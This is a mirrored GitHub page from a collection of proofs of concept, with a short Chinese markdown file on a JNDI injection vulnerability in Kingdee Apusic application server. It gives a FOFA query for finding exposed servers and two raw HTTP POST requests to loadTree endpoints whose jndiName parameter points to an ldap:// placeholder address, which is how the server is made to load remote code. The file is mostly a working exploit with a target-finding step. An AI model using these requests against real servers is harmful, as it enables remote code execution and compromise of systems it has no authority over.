admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/金蝶Apusic应用服务器loadTree JNDI注入漏洞.md

720 B
Raw Blame History

金蝶Apusic应用服务器loadTree JNDI注入漏洞

fofa

app="Apusic应用服务器"

poc

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址

POST /admin/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址

a519acd405e2e60c00108378f8410c8d

1dc3f827f335c01618f9dd9c4b39832b

584c726b09f954433d5c3248ac5c1368

##漏洞来源